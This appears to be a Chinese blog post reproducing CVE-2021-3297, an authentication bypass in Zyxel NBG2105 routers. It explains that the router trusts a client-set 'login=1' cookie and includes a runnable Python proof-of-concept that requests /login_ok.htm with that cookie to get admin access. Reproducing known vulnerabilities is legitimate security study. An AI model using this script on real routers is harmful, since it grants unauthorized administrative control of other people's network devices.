Zyxel-NBG2105(CVE-2021-3297)身份验证绕过漏洞复现
简介
Zyxel-NBG2105 存在身份验证绕过,可以通过更改 login参数可用实现以管理员身份进行后台登陆。
zoomeye
漏洞验证
通过右键源代码查看一下源码,这里不知道为什么不能右键,就在网址前加view-source:查看源代码。
这里源代码中存在一个js文件对前端的cookie login参数进行校验。
进入该js文件在前端中搜索login
可以看到检测到cookie中的login=1则会跳转到home.html页面。
直接利用浏览器插件hackbar构造url
发送请求后会以管理员身份跳转到home.html页面
成功绕过登录。
利用代码
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef poc(url):exp = url + "/login_ok.htm"header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","cookie":"login=1",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=exp, headers=header, verify=False,timeout=10)#print(response.text)if response.status_code == 200 and "GMT" in response.text:print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")print("数据信息如下:")print(response.text)else:print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")except Exception as e:print(exp + "请求失败!!")def main():url = str(input("请输入目标url:"))poc(url)if __name__ == "__main__":main()
附今日份休闲:
结语
错过了落日余晖,还会有满天星辰,身边人来人往,希望我们还是我们。
Zyxel-NBG2105(CVE-2021-3297)身份验证绕过漏洞复现相关推荐
- struts2漏洞监测_Apache Shiro身份验证绕过漏洞风险提示
漏洞公告 2020年8月17日,安恒应急响应中心监测发现Apache Shiro官方更新发布了1.6.0之前版本存在身份验证绕过的漏洞公告,对应CVE编号:CVE-2020-13933,相关链接: h ...
- 身份验证绕过漏洞分析
0x01 前言 最近Tenable 披露了Arcadyna 网络设备身份验证绕过漏洞,并且很多的厂商都采用产生漏洞的组件,由于Arcadyan 设备固件厂商并没有开源出来,在官网支持里面下载的文件是w ...
- 【高危】Apache Linkis Gateway模块存在身份验证绕过漏洞(CVE-2023-27987)
漏洞描述 Apache Linkis 是一个用于将上层应用与底层数据引擎解耦,提供标准化接口的中间件.Gateway 是 Linkis 接受客户端和外部请求的主要入口点, 在 Apache Linki ...
- 98.网络安全渗透测试—[常规漏洞挖掘与利用篇14]—[SESSION身份验证绕过漏洞与测试]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.session身份验证绕过漏洞与测试 1.session机制 2.session的生命周期 3.出现漏洞的情 ...
- 黑客利用数百万路由器的新身份验证绕过漏洞
身份不明的黑客正在积极利用关键的身份验证绕过漏洞劫持家庭路由器,将它们纳入用于执行 DDoS 攻击的 Mirai 变体僵尸网络,仅在其公开披露两天后. 该漏洞被跟踪为CVE-2021-20090(CV ...
- 【CVE-2020-1957】shiro搭配spring时身份验证绕过漏洞分析
0x00 漏洞简介 https://www.openwall.com/lists/oss-security/2020/03/23/2 0x01 漏洞分析 翻查官方commit,在commit http ...
- CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞
GitHub地址: https://github.com/hughink/CVE-2022-40684 漏洞简介 Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防 ...
- Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现
Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现 0x01 漏洞简介 Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证.授权. ...
- 烽火狼烟丨VMware Workspace ONE Access身份验证绕过、本地提权漏洞风险提示
1.漏洞概述 近日,WebRAY安全服务产品线监测到VMware官方发布安全公告,修复了两个存在于VMware Workspace ONE Access产品的漏洞. VMware认证绕过漏洞(CVE- ...
最新文章
- luogu P4745 [CERC2017]Gambling Guide(期望DP + 最短路实现)
- 三代测序之微生物基因组 de novo 测序
- 计算机组装与维护教案_计算机组装与维护小课堂(1)
- ubuntu10.04开启root登陆
- asp建站系统源码_【服务器安全】windows系统安全注意事项
- 3DSlicer15:Scripted Module
- Linux 将文件打包、压缩并分割成指定大小
- tornado实现基于websocket的好友一对一聊天功能
- base64码通过http传输 +号变 空格 以及 图片编码后字符串较长导致POST提交失败 问题解决...
- 2019年可能是折叠手机爆发的一年:华为、三星、小米已确认 LG“掉队”
- 请教一个ghost恢复的问题
- 【免费毕设】基于PHP实现的WEB图片共享系统(源代码+论文)
- 阿里为什么推荐使用LongAdder?而不是AtomicLong?
- 双击ctrl搜索 意在颠覆用户的习惯
- oracle vm virtualbox安装xp,如何在VirtualBox虚拟机中安装XP系统?
- 数学分析教程(科大)——6.2笔记+习题
- 数学建模MATLAB难不难,如何才能在数学建模竞赛中取得好成绩
- WIN10教育版怎么可以变更为专业版
- iOS 项目默认竖屏 个别页面横屏
- 开拓海外市场,需要选择怎样的云服务?